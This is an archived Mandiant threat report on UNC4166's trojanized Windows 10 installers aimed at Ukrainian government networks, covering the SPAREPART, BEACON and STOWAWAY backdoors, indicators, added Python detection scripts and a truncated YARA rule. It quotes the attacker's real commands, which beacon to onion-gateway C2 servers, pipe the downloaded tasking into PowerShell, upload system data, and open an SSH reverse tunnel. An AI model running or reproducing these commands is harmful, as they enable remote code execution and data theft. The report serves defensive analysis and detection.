{
	"id": "a4ac4266-7743-429c-a39a-3b22f05cfe45",
	"created_at": "2026-04-06T00:10:21.220949Z",
	"updated_at": "2026-04-10T13:12:55.278031Z",
	"deleted_at": null,
	"sha1_hash": "7cb24cc595c3aca655b66d961c523a915af58560",
	"title": "Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2525940,
	"plain_text": "Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government | Mandiant\r\nBy Mandiant\r\nPublished: 2022-12-15 · Archived: 2026-04-05 15:34:36 UTC\r\nWritten by: Mandiant Intelligence\r\nExecutive Summary\r\nMandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 operating system installers. These were distributed via torrent sites in a supply chain attack.\r\nThreat activity tracked as UNC4166 likely trojanized and distributed malicious Windows operating system installers which drop malware that conducts reconnaissance and, on some victims, deploys additional capability to conduct data theft.\r\nThe trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise, the targets selected for follow-on activity included multiple Ukrainian government organizations.\r\nAt this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166’s targets overlap with organizations targeted by GRU-related clusters with wipers at the outset of the war.\r\nThreat Detail\r\nMandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 operating system installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. 
In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance, including the STOWAWAY, BEACON, and SPAREPART backdoors.\r\nOne trojanized ISO, “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4), uses the Ukrainian language pack and could be downloaded from “https://toloka[.]to/t657016#1873175”. The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1). The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image.\r\nThe ISO contained altered scheduled tasks that were identified on multiple systems at three different Ukrainian organizations, beaconing to .onion addresses through Tor gateways beginning around mid-July 2022.\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 1 of 14\n\nFigure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)\r\nAttribution and Targeting\r\nMandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. 
The use of trojanized ISOs is novel in espionage operations, and the included anti-detection capabilities indicate that the actors behind this activity are security conscious and patient, as the operation would have required significant time and resources to develop and then to wait for the ISO to be installed on a network of interest.\r\nMandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government.\r\nThe organizations where UNC4166 conducted follow-on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion.\r\nThis ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker”, which was created on May 11, 2022.\r\nThe ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and to block automatic updates and license verification.\r\nThere was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers.\r\nOutlook and Implications\r\nSupply chain operations can be leveraged for broad access, as in the case of NotPetya, or for the ability to discreetly select high value targets of interest, as in the SolarWinds incident. 
These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attacks which may not be contained to the conflict zone.\r\nFor more research from Google Cloud on securing the supply chain, see this Perspectives on Security report.\r\nTechnical Annex\r\nMandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a Tor website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server; the responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking.\r\nIn some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users, including the deployment of the STOWAWAY and BEACON backdoors.\r\nSTOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication, such as SSH and SOCKS5. The backdoor component supports upload and download of files, a remote shell, and basic information gathering.\r\nBEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. 
BEACON communicates with a C2 server via HTTP or DNS.\r\nThe threat actor also began to deploy secondary toehold backdoors in the environment, including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps.\r\nSPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process.\r\nDetails\r\nInfection Vector\r\nMandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded scheduled task to determine whether the victim should have further payloads deployed.\r\nWin10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)\r\nMalicious trojanized Windows 10 installer\r\nDownloaded from https://toloka.to/t657016#1873175\r\nForensic analysis of the ISO identified the changes made by UNC4166 that enable the threat actor to perform additional triage of victim accounts:\r\nModification of the GatherNetworkInfo and Consolidator Scheduled Tasks\r\n
The ISO contained altered GatherNetworkInfo and Consolidator scheduled tasks, to which a secondary action executing a PowerShell downloader had been added. Both scheduled tasks are legitimate components of Windows and normally execute only the gatherNetworkInfo.vbs script or the wsqmcons.exe process.\r\nFigure 2: Legitimate GatherNetworkInfo task configuration\r\nThe altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command uses the curl binary to download a command from the C2 server; the downloaded command is then executed through PowerShell.\r\nThe C2 servers in both instances were addresses of Tor gateways (onion.moe, onion.ws). These gateways advertise themselves as a mechanism for users to reach Tor hidden services from the standard internet, so the implant needs no Tor client of its own and its beacon is an ordinary HTTPS request to a clearnet host (the -k flag tells curl to ignore certificate errors).\r\nThese tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow-on threat activity.\r\nFigure 3: Trojanized GatherNetworkInfo task configuration\r\nBased on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows:\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)\r\nLast edit date: 2022-05-11 12:58:55\r\nExecutes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)))\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)\r\nLast edit date: 2022-05-11 12:58:12\r\nExecutes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe\r\nBoth last-edit timestamps fall on May 11, 2022, the same day the Isomaker account that uploaded the ISO to toloka.to was created.\r\nNote: At the time of analysis, the onion[.]ws C2 server was redirecting requests to legitimate websites.\r\nSoftware Piracy Script\r\nThe ISO contained an additional file not found in 
standard Windows distributions called SetupComplete.cmd. SetupComplete.cmd is a Windows batch script that Windows Setup executes upon completion of the installation, before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts, including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid), with the addition of a command to disable OneDriveSetup which was not identified in either script.\r\nThe script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the Windows license.\r\nForensic artifacts led Mandiant to identify the versions of this script that were historically on the image; we assess that over time the threat actor made alterations to these files.\r\nSetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669)\r\nBatch script to disable legitimate services and activate Windows\r\nFile currently hosted on ISO\r\nSetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3)\r\nBatch script to disable legitimate services and activate Windows\r\nFile recovered through forensic file carving\r\nSetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B)\r\nBatch script to disable legitimate services and activate Windows\r\nFile recovered through forensic file carving\r\nVictim Identification\r\nMandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized scheduled tasks. 
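Auditing the task store for the alteration described above, as an added example written for this page (it is not Mandiant's code and not a tool from the report): the Python below parses Task Scheduler XML and flags a task whose Actions element carries more than the single Exec the stock task has, a Command whose basename is not the expected one, or a command line containing powershell, curl, .onion, or wmic csproduct. The two embedded task documents are constructed, simplified stand-ins for the legitimate and trojanized GatherNetworkInfo task (path separators normalized to forward slashes, placeholder C2 host); the expected-command table and the TASK_ROOT path are this example's own assumptions.\r\n
```python
import codecs
import os
import xml.etree.ElementTree as ET

# Commands each audited task is expected to run, keyed by lower-case task file name.
# Assumption for illustration: the stock tasks named in the report run exactly these binaries.
EXPECTED_COMMANDS = {
    'gathernetworkinfo': {'gathernetworkinfo.vbs'},
    'consolidator': {'wsqmcons.exe'},
}

# Tokens that never belong in either task's action; any hit is a finding.
SUSPICIOUS_TOKENS = ('powershell', 'curl', '.onion', 'wmic csproduct')

# Task store on a live host; forward slashes are accepted by the Windows file APIs.
TASK_ROOT = 'C:/Windows/System32/Tasks'

def strip_ns(tag):
    # Task XML carries the mit/task namespace; compare on the local element name only.
    return tag.rsplit('}', 1)[-1]

def basename(path):
    # chr(92) is a backslash; accept either separator in Command elements.
    return path.replace(chr(92), '/').rsplit('/', 1)[-1]

def exec_actions(xml_text):
    # Every (Command, Arguments) pair under Actions, in document order.
    actions = []
    for el in ET.fromstring(xml_text).iter():
        if strip_ns(el.tag) != 'Exec':
            continue
        cmd = args = ''
        for child in el:
            if strip_ns(child.tag) == 'Command':
                cmd = (child.text or '').strip()
            elif strip_ns(child.tag) == 'Arguments':
                args = (child.text or '').strip()
        actions.append((cmd, args))
    return actions

def audit_task(xml_text, task_name):
    # List of (finding, detail) tuples; an untouched task yields [].
    findings = []
    actions = exec_actions(xml_text)
    if len(actions) > 1:
        findings.append(('extra_action', f'{len(actions)} Exec actions, expected 1'))
    allowed = EXPECTED_COMMANDS.get(task_name.lower(), set())
    for cmd, args in actions:
        if allowed and basename(cmd).lower() not in allowed:
            findings.append(('unexpected_command', cmd))
        blob = (cmd + ' ' + args).lower()
        findings.extend(('suspicious_token', tok) for tok in SUSPICIOUS_TOKENS if tok in blob)
    return findings

def load_task_file(path):
    # Task files on disk are UTF-16 with a BOM; drop the XML declaration so the decoded
    # str can be parsed regardless of the encoding it declares.
    with open(path, 'rb') as fh:
        raw = fh.read()
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        text = raw.decode('utf-16')
    else:
        text = raw.decode('utf-8', 'replace')
    if text.lstrip().startswith('<?xml'):
        text = text.split('?>', 1)[1]
    return text

def audit_directory(root=TASK_ROOT):
    # Walk the task store and audit only the two tasks this report covers.
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in EXPECTED_COMMANDS:
                path = os.path.join(dirpath, name)
                results[path] = audit_task(load_task_file(path), name)
    return results

# Constructed, simplified stand-in for the stock NetTrace/GatherNetworkInfo task.
LEGIT_TASK = '''<Task version='1.3' xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>
  <Actions Context='LocalSystem'>
    <Exec>
      <Command>%windir%/system32/gatherNetworkInfo.vbs</Command>
    </Exec>
  </Actions>
</Task>'''

# Constructed stand-in for the altered task: same first action plus the downloader action.
TROJANIZED_TASK = '''<Task version='1.3' xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>
  <Actions Context='LocalSystem'>
    <Exec>
      <Command>%windir%/system32/gatherNetworkInfo.vbs</Command>
    </Exec>
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>curl.exe -k https://c2-placeholder.onion.moe -H ('h:'+(wmic csproduct get UUID)) | powershell.exe</Arguments>
    </Exec>
  </Actions>
</Task>'''

if __name__ == '__main__':
    print(audit_task(LEGIT_TASK, 'GatherNetworkInfo'))
    print(audit_task(TROJANIZED_TASK, 'GatherNetworkInfo'))
```
Run audit_directory() from an elevated session on a suspect host, or point it at the Tasks folder of a mounted image. A stock installation yields an empty list for both tasks; the image described here yields an extra_action finding plus unexpected_command and suspicious_token hits for the powershell.exe action on each of them.\r\n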
In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the case of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY.\r\nThe threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests, both to download tasking and to upload stolen data/responses.\r\nThe threat actor’s playbook appears to follow a distinct pattern:\r\nExecute a command\r\nOptionally, filter or expand the results\r\nExport the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%\\sysinfo)\r\nOptionally, compress the data into sysinfo.zip (%system32%\\sysinfo.zip)\r\nOptionally, upload the data immediately to the C2 (in most cases this is a separate task that is executed at the next beacon)\r\nMandiant identified the threat actor exfiltrating system information, directory listings including timestamps, and device geolocation. A list of commands used can be found in the Indicators section.\r\nInterestingly, we did uncover a command that did not fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks.\r\ncurl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile --output temp.zip\r\nAlthough we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. 
This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it is unclear why they would not deploy the command directly.\r\nchcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument \"Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8\" -wait -nonewwindow; curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary \"@sysinfo\" -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo\r\nThe download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value. It is unclear why the threat actor performed this additional request instead of downloading the command itself; we believe this may be used as a default command by the threat actors.\r\nFollow On Tasking\r\nIf UNC4166 determined a device likely contained intelligence of value, subsequent actions were taken on these devices. Based on our analysis, the subsequent tasking falls into three categories:\r\nDeployment of tools to enable exfiltration of data (like Tor and Sheret)\r\nDeployment of additional lightweight backdoors likely to provide redundant access to the target (like SPAREPART)\r\nDeployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY)\r\nTor Browser Downloaded\r\nIn some instances, Mandiant identified that the threat actor attempted to download the Tor browser onto the victim’s device. 
This was originally attempted by downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second Tor installer directly from the official torproject.org website.\r\nIt is unclear why the threat actor performed these actions, as Mandiant was unable to identify any use of Tor on the victim device, although this would provide the actor a second route to communicate with infrastructure through Tor or may be used by additional capability as a route for exfiltration.\r\nWe also discovered that the Tor installer was hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device.\r\nbundle.zip (MD5: 66da9976c96803996fc5465decf87630)\r\nLegitimate Tor installer bundle\r\nDownloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip\r\nDownloaded from https://56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip\r\nUse of Sheret HTTP Server and localhost[.]run\r\nIn some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices. 
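The command lines quoted in this annex (the curl beacon carrying the UUID header and piped into PowerShell, the sysinfo upload, the download under the hard-coded default UUID, the ssh -R tunnel to localhost[.]run quoted just below, and the SPAREPART service installation described after it) share enough shape to be matched from process-creation telemetry. The rule set below is an added example written for this page, not a Mandiant detection: it normalizes a command line (undoing the [.] defanging used in this report and folding case), applies one rule per behaviour, and runs them over a constructed batch of events. The events, the 56-character placeholder onion hostname built by repeating c2, and the sc create form of the service installation are constructed for the example; the rules are this example's own assumptions about the minimum each command must contain.\r\n
```python
import re

# Undo the [.] defanging used in the report text and fold case so rules can use plain substrings.
def normalize(cmdline):
    return cmdline.replace('[.]', '.').lower()

# A v3 onion name (56 base32 chars) or a v2 one (16) reached through a Tor2web-style gateway.
# The [.] character classes are literal dots, so no escaping is needed.
ONION_GATEWAY = re.compile(r'[a-z2-7]{16,56}[.]onion[.](moe|ws)')

# One rule per behaviour described in the report; each predicate sees the normalized command line.
RULES = [
    ('tor_gateway_c2', lambda s: ONION_GATEWAY.search(s) is not None),
    ('uuid_header_beacon', lambda s: 'curl' in s and 'wmic csproduct get uuid' in s and '-h' in s),
    ('piped_to_powershell', lambda s: 'curl' in s and '| powershell' in s),
    ('sysinfo_upload', lambda s: '--data-binary' in s and 'sysinfo' in s),
    ('default_uuid_download', lambda s: 'filefile-file-file-file-filefilefile' in s),
    ('reverse_ssh_tunnel', lambda s: 'ssh' in s.split(' ', 1)[0] and ' -r ' in s and 'localhost.run' in s),
    ('spurious_delivery_service', lambda s: 'microsoftdeliverycenter' in s),
]

def classify(cmdline):
    # Names of every rule the command line satisfies, sorted so results are stable.
    s = normalize(cmdline)
    return sorted(name for name, pred in RULES if pred(s))

def scan(events):
    # events: iterable of (image, cmdline); returns (index, image, rules) for each hit only.
    hits = []
    for i, (image, cmdline) in enumerate(events):
        rules = classify(cmdline)
        if rules:
            hits.append((i, image, rules))
    return hits

# Constructed placeholder for the gateway-fronted onion host: 56 base32 characters.
C2 = 'c2' * 28

BEACON_CMD = '''powershell.exe curl.exe -k https://''' + C2 + '''.onion[.]ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe'''
UPLOAD_CMD = ('''chcp 65001; Start-Process powershell -argument 'Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8' -wait -nonewwindow; '''
              '''curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary '@sysinfo' -k https://''' + C2 + '.onion.moe; rm sysinfo')
DEFAULT_UUID_CMD = 'curl.exe -k https://' + C2 + '.onion.moe -H h:filefile-file-file-file-filefilefile --output temp.zip'
TUNNEL_CMD = 'ssh -R 80:localhost:80 -i defaultssh localhost.run -o stricthostkeychecking=no >> sysinfo'
SERVICE_CMD = ('sc create MicrosoftDeliveryNetwork binPath= C:/Windows/System32/MicrosoftDeliveryNetwork/MicrosoftDeliveryCenter '
               + C2 + '.onion.moe powershell.exe')

# Constructed sample batch: benign administrative activity interleaved with the five patterns above.
SAMPLE_EVENTS = [
    ('curl.exe', 'curl.exe -s https://updates.example.com/manifest.json -o manifest.json'),
    ('powershell.exe', BEACON_CMD),
    ('ssh.exe', 'ssh -i key.pem admin@bastion.example.net'),
    ('powershell.exe', UPLOAD_CMD),
    ('powershell.exe', 'powershell.exe Get-ComputerInfo | Export-Csv -path report.csv'),
    ('curl.exe', DEFAULT_UUID_CMD),
    ('ssh.exe', TUNNEL_CMD),
    ('sc.exe', SERVICE_CMD),
]

if __name__ == '__main__':
    for index, image, rules in scan(SAMPLE_EVENTS):
        print(index, image, ', '.join(rules))
```
Feed it the CommandLine field of Sysmon event 1 or Security event 4688 records (the latter only carries the command line when process-creation command-line auditing is enabled). A hit on reverse_ssh_tunnel, default_uuid_download or uuid_header_beacon is specific enough to page on; tor_gateway_c2 alone should be checked against the host's legitimate use of Tor gateways, and the defanged form of the onion host is accepted so the rules can also be run over indicator text.\r\n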
The threat actor configured Sheret to serve locally, then used SSH to create a reverse tunnel from the local device to the service localhost[.]run.\r\nIn at least one instance, this web server was used for serving files on a removable drive connected to the victim device, and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism.\r\nThe command used for SSH tunnelling was:\r\nssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no \u003e\u003e sysinfo\r\nThe -R 80:localhost:80 option asks the localhost.run side to forward connections arriving at its port 80 back to port 80 on the victim device, where Sheret is listening, so the files Sheret serves become reachable from the internet through a localhost.run hostname. stricthostkeychecking=no suppresses the host key prompt so the command runs unattended, and the session output is appended to the sysinfo file, the same path the beacon uploads to the C2.\r\nC:\\Windows\\System32\\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d)\r\nSheret web server\r\nPublicly available as a build from https://github.com/ethanpil/sheret\r\nCompiled date: 1970/01/01 00:00:00\r\nDeployment of SPAREPART, Likely as a Redundant Backdoor\r\nWe identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute %SYSTEM32%\\MicrosoftDeliveryNetwork\\MicrosoftDeliveryCenter with the arguments “56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the Windows SC command.\r\nFunctionally, SPAREPART is identical to the PowerShell backdoors that were deployed via the scheduled tasks in the original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the tasking and execute it by piping the commands into the PowerShell process.\r\nSPAREPART parses the raw SMBIOS firmware table via the Windows GetSystemFirmwareTable API; this code is nearly identical to code published by Microsoft on GitHub. 
The code’s purpose is to obtain the UUID of the device, which is later formatted into the same header (h: \u003cUUID\u003e) for use in communications with the C2 server.\r\nFigure 4: SPAREPART formatting of header\r\nThe payload parses the arguments provided on the command line. Interestingly, there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second argument (in our instance powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument, which means that the payload is unable to execute commands provided by the threat actor.\r\nFigure 5: SPAREPART parsing threat actor input\r\nSPAREPART has a unique randomization for its sleep timer, which enables the threat actor to randomize beaconing timing. The randomization is seeded from the base address of the image in memory; this value is then used to determine a value between 0 and 59, which acts as the sleep timer in minutes. As the backdoor starts up, it will sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours.\r\nIf after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed.\r\nFigure 6: SPAREPART randomizing the time for next beacon\r\nAfter the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. 
The payload attempts to perform a GET request using the previously formatted headers; provided the response is a valid status (200), the data will be read and written to a previously created pipe.\r\nFigure 7: SPAREPART downloading payload\r\nIf a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands to it as standard input. The payload makes no attempt to return the response to the actor, like the PowerShell backdoor.\r\nFigure 8: SPAREPART executing a command\r\nAlthough we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact that the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor loses access to the original scheduled tasks.\r\nMicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8)\r\nSPAREPART backdoor\r\nCompiled on: 2022/11/28 02:32:33\r\nPDB path: C:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb\r\nDeployment of Additional Backdoors\r\nIn addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on a limited number of devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a scheduled task named AzureSync on at least one device. 
The scheduled task was configured to execute the DLL via rundll32.exe.\r\nAzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on June 24, 2022, and presented a Let’s Encrypt TLS certificate dated August 26, 2022.\r\nC:\\Windows\\System32\\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)\r\nBEACON backdoor\r\nOriginal name: tr2fe.dll\r\nCompiled on: 1970/01/01 00:00:00\r\nDropped by 529388109f4d69ce5314423242947c31 (BEACON)\r\nConnects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–\r\nConnects to https://cdnworld[.]org/34702–general/sync/42823419-cdn\r\nDue to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified that the threat actor had deployed a STOWAWAY backdoor on the victim device.\r\nC:\\Windows\\System32\\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)\r\nSTOWAWAY backdoor (the file name mimics the legitimate splwow64.exe)\r\nCompiled on: 1970/01/01 00:00:00\r\nConnects to 193.142.30.166:443\r\n%LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)\r\nSTOWAWAY backdoor\r\nCompiled on: 1970/01/01 00:00:00\r\nConnects to 91.205.230.66:8443\r\nIndicators\r\nScheduled Tasks\r\nC:\\Windows\\System32\\Tasks\\MicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d)\r\nScheduled task configured to execute Powershell.exe with the command line curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell\r\nTrojanized Scheduled Tasks\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator (MD5: 
ed7ab9c74aad08b938b320765b5c380d)\r\nBEACON Backdoor\r\nC:\\Windows\\System32\\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)\r\nScheduled Tasks for Persistence\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Maintenance\\AzureSync\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Maintenance\\AzureSyncDaily\r\nSTOWAWAY Backdoor\r\nC:\\Windows\\System32\\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)\r\n%LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)\r\nServices for Persistence\r\nPrinter driver host for applications\r\nSODUsvc\r\nOn Host Recon Commands\r\nGet-ChildItem -Recurse -Force -Path ((C:)+'') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force;\r\nGet-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8\r\ninvoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8\r\nGet-Volume | Where-Object {$_.DriveLetter -and $_.DriveLetter -ne 'C' -and $_.DriveType -eq 'Fixed'} | ForEach-Object {Get-ChildItem -Recurse -Directory ($_.DriveLetter+':') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary '@sysinfo.zip' -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe\r\nchcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument \"Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8\" -wait -nonewwindow; curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary \"@sysinfo\" 
-k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo\r\nTrojanized Windows Image Network Indicators\r\n56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe (Malicious Windows Image Tor C2)\r\nufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe (Malicious Windows Image Tor C2)\r\nufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws (Malicious Windows Image Tor C2)\r\nBEACON C2s\r\nhttps://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–\r\nhttps://cdnworld[.]org/34702–general/sync/42823419-cdn\r\nSTOWAWAY C2s\r\n193.142.30[.]166:443\r\n91.205.230[.]66:8443\r\nAppendix\r\nMITRE ATT\u0026CK Framework\r\nDetection Rules\r\nrule M_Backdoor_SPAREPART_SleepGenerator\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        date_created = \"2022-12-14\"\r\n        description = \"Detects the algorithm used to determine the next sleep timer\"\r\n        version = \"1\"\r\n        weight = \"100\"\r\n        hash = \"f9cd5b145e372553dded92628db038d8\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $ = {C1 E8 06 89 [5] C1 E8 02 8B}\r\n        $ = {c1 e9 03 33 c1 [3] c1 e9 